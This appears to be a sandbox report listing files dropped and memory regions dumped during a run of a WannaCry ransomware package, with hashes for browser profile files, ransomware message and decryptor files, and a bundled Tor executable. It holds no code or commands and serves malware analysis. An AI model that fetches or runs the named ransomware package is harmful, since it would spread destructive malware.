C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D7EB97B69BE4CE4C6BB9083B4E08A4B504BFC2E3
| MD5 | 67f443e93881f3a8729a68f8ca7d010c |
| SHA1 | 7d991be184bd62f7aca08cbab25eda10d7ec3407 |
| SHA256 | 702188efa49275a844784ec0e29889042968d2cd687726829211b9bb408817c2 |
| SHA512 | 13c5fed144cac20aebf3fd4a20139499f80e85affed489096afae28abbfad3040dea010330017fdc076d6d118338b046512cfd931d0cff9abd43215ece592a9a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\73C7F1E668813518B669C33D69033779C04F9F54
| MD5 | 8ce1dbe213c521295d982186a64f2d66 |
| SHA1 | 86f224a6bf9f14ef58014ef3e81fe94e13f5fe9f |
| SHA256 | 51da84548b383246cb6acb4c61391e522547317f87a9082fdae7db0ee47518be |
| SHA512 | 195bb8d565dc4f5d43df9185fff2cc8e024099fcdcaa706c4063981951a80f8a852e381f6be070aec807424cd8cbcaa3f3a4dcc188a5f7915229414203484835 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\71BF779DFBCE1307F42244F92E6190F178BC7120
| MD5 | 22aa739b37f72115d255d12d67055e89 |
| SHA1 | c45f3ebb2ef52f0f7aef0c6d8b750270a6e6fe09 |
| SHA256 | 96653ee7fa907a7d895f6474e04196b1d0a24bb27023e264643d61d750c74f99 |
| SHA512 | 758632e16636457f22f6e88888382a6e1397b792a263c99aa01bf695033dad8ead082255e1b3c2816315a05136b1314e9848730ad0968bdaf56fed142578cb51 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6586F7B38489859730F9ADC10B28BFE43E7639AA
| MD5 | d1cf0bcb9133ac2dbd48c9e1b52c4cc1 |
| SHA1 | 22369e29f5c235e021d09a55c073e2a7716e7803 |
| SHA256 | b6f779a3ab8cc2628e3d52d8b896e9c761363ce462eb32e52433f32fa9eb4e7b |
| SHA512 | f43987f740933bd9df1968dcc620893816641a0e8eb6c496b3c5221e05619b1bbf103d2d2cac4b23b5cdb5767a6aa3b4c3e8e39d2bce713a6404edd7462bc0cf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\.metadata-v2
| MD5 | d53c4d4f0b260dde2b2d15c8dcca8d57 |
| SHA1 | 78edb9c35231166155194f67b1072b0349d0c47c |
| SHA256 | 56d960ec7a89b4cf1b0b5db5b243d9f1dc31e5d6b516764cbe0311ac09ed5248 |
| SHA512 | dbca4331417a5e2ecba9a0aef370b62e95ee4a528da91b562716357d669c47f927e982eef4b82997674f2168d809428bd387e1f930267fb654942619f08061b2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 0c05beb316805ddf8a308efc4e080a51 |
| SHA1 | f4d4467d8b09e9d7a37228cb24e0ecde718184dd |
| SHA256 | c832b8d343889538d94a62b6c2867d539cd63909e51009b6322ccab591c91aae |
| SHA512 | fe766c7019c3b53469745ecc95aabdf0dfd5d734a27b713d9fcc9214bc72e329b3bd0d756a14068c550cb9d8fb20da6046a8609e143012c3cc82893a10d61245 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp
| MD5 | 99601438ae1349b653fcd00278943f90 |
| SHA1 | 8958d05e9362f6f0f3b616f7bfd0aeb5d37967c9 |
| SHA256 | 72d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a |
| SHA512 | ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp
| MD5 | 65690c43c42921410ec8043e34f09079 |
| SHA1 | 362add4dbd0c978ae222a354a4e8d35563da14b4 |
| SHA256 | 7343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d |
| SHA512 | c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js
| MD5 | ed0d39374817d98361c50ac217abeed5 |
| SHA1 | 00d0ca72a80fb571a46868e63a676daa1f5a881e |
| SHA256 | 27d66f2b9b52714f079295da5540fce00b03ecdd27fa9386dbd9fa43a3106221 |
| SHA512 | 206bec5532011b3871782db2c917fa1f5931e661c34ca0872bad3b5635f51cfa75675b61f3d6530201748aefd42a177de20464005e91f556b2c7674a32743b3e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp
| MD5 | e6c20f53d6714067f2b49d0e9ba8030e |
| SHA1 | f516dc1084cdd8302b3e7f7167b905e603b6f04f |
| SHA256 | 50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092 |
| SHA512 | 462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4
| MD5 | 7ee5a4ebd367e6ae57468edb9d309e53 |
| SHA1 | 08fb2dc7d2a4981ced5284d4f60107b416060651 |
| SHA256 | ea352fcf99131dc7628a51906329899b0c683e71563ae034ff929ea191250c30 |
| SHA512 | 8599cb2d7bbea75169713ac63ae472ab14cdb374aa926a6eb4093b7e23c6f856abfce7eb556e692309860c63fee57b78c1e77be41e3000699ae0e8c01ba3f461 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json.tmp
| MD5 | 1995825c748914809df775643764920f |
| SHA1 | 55c55d77bb712d2d831996344f0a1b3e0b7ff98a |
| SHA256 | 87835b1bd7d0934f997ef51c977349809551d47e32c3c9224899359ae0fce776 |
| SHA512 | c311970610d836550a07feb47bd0774fd728130d0660cbada2d2d68f2fcfbe84e85404d7f5b8ab0f71a6c947561dcffa95df2782a712f4dcb7230ea8ba01c34c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\places.sqlite
| MD5 | 7e52267e294ce61a87a97fcb5ce55a26 |
| SHA1 | 333a1a9681c874cd026f41512f8574c04cfb88f5 |
| SHA256 | bba0368915c7debe6ae1a6f55d6e83527472661dd755b2eed6e81f31cde0f9e5 |
| SHA512 | 022dde657c1ab98607935f65d37e6517affec2dd44e4b526feca8baad85a0bc8915c7330a0f5fbb4e9f2d98c52654cf5086d5d33b2436cb01156b222af293821 |
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\msg\m_finnish.wnry
| MD5 | 35c2f97eea8819b1caebd23fee732d8f |
| SHA1 | e354d1cc43d6a39d9732adea5d3b0f57284255d2 |
| SHA256 | 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e |
| SHA512 | 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf |
memory/1292-1224-0x0000000010000000-0x0000000010010000-memory.dmp
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
| MD5 | 7bf2b57f2a205768755c07f238fb32cc |
| SHA1 | 45356a9dd616ed7161a3b9192e2f318d0ab5ad10 |
| SHA256 | b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25 |
| SHA512 | 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9 |
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
| MD5 | 7a2726bb6e6a79fb1d092b7f2b688af0 |
| SHA1 | b3effadce8b76aee8cd6ce2eccbb8701797468a2 |
| SHA256 | 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5 |
| SHA512 | 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54 |
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\@[email protected]
| MD5 | f7c8b8b4247369e249daaea1ff17cce5 |
| SHA1 | 8b255c168725fff9d518d1c393ae3508b57ff675 |
| SHA256 | 716f0afbfe75c8976529d7dbc490e5f8fd0f9b7be9f13e188142d5617f3fdf84 |
| SHA512 | 07387f82ea88167b90435dc134a68cdc3cf517fdfb8482f1ddf36bd34f29d60539c7a2c36d3fc297bd83f29399750be7f497cff89edc8c60ec6730dd9140ac70 |
C:\Users\Default\Desktop\@[email protected]
| MD5 | c17170262312f3be7027bc2ca825bf0c |
| SHA1 | f19eceda82973239a1fdc5826bce7691e5dcb4fb |
| SHA256 | d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa |
| SHA512 | c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c |
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\tor.exe
| MD5 | fe7eb54691ad6e6af77f8a9a0b6de26d |
| SHA1 | 53912d33bec3375153b7e4e68b78d66dab62671a |
| SHA256 | e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb |
| SHA512 | 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f |
memory/5096-2586-0x0000000072C90000-0x0000000072D12000-memory.dmp
memory/5096-2589-0x0000000072BC0000-0x0000000072BE2000-memory.dmp
memory/5096-2588-0x0000000072910000-0x0000000072992000-memory.dmp
memory/5096-2587-0x00000000729A0000-0x0000000072BBC000-memory.dmp
memory/5096-2590-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2594-0x0000000072C90000-0x0000000072D12000-memory.dmp
memory/5096-2599-0x0000000072910000-0x0000000072992000-memory.dmp
memory/5096-2598-0x00000000729A0000-0x0000000072BBC000-memory.dmp
memory/5096-2597-0x0000000072BC0000-0x0000000072BE2000-memory.dmp
memory/5096-2596-0x0000000072BF0000-0x0000000072C67000-memory.dmp
memory/5096-2595-0x0000000072C70000-0x0000000072C8C000-memory.dmp
memory/5096-2593-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2603-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2619-0x00000000729A0000-0x0000000072BBC000-memory.dmp
memory/5096-2614-0x0000000001060000-0x000000000135E000-memory.dmp
memory/1972-2627-0x0000000000160000-0x000000000016E000-memory.dmp
memory/1972-2628-0x0000000004FB0000-0x00000000054AE000-memory.dmp
memory/1972-2629-0x0000000004B50000-0x0000000004BE2000-memory.dmp
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
| MD5 | 6700e499687c2d4d29fd12ed96c5fc3e |
| SHA1 | 0da3429fd52193afe9b33199d1e0d67ba2233489 |
| SHA256 | 067511028460a92c0fb2631ce3d838fa499cd32c525e1777e0f0c2fbab87e492 |
| SHA512 | 06ca2464916553067ba5579f19a5d03b0e8c39cfacfcca3697b0d36ba8e5433296b87188572beb09ccdc09f2a38d2facec2a34e74c33542cdb3c42d649d1fc0a |
memory/1972-2637-0x0000000004B10000-0x0000000004B1A000-memory.dmp
memory/5096-2650-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2655-0x00000000729A0000-0x0000000072BBC000-memory.dmp
memory/5096-2657-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2707-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2719-0x0000000001060000-0x000000000135E000-memory.dmp
memory/5096-2728-0x0000000001060000-0x000000000135E000-memory.dmp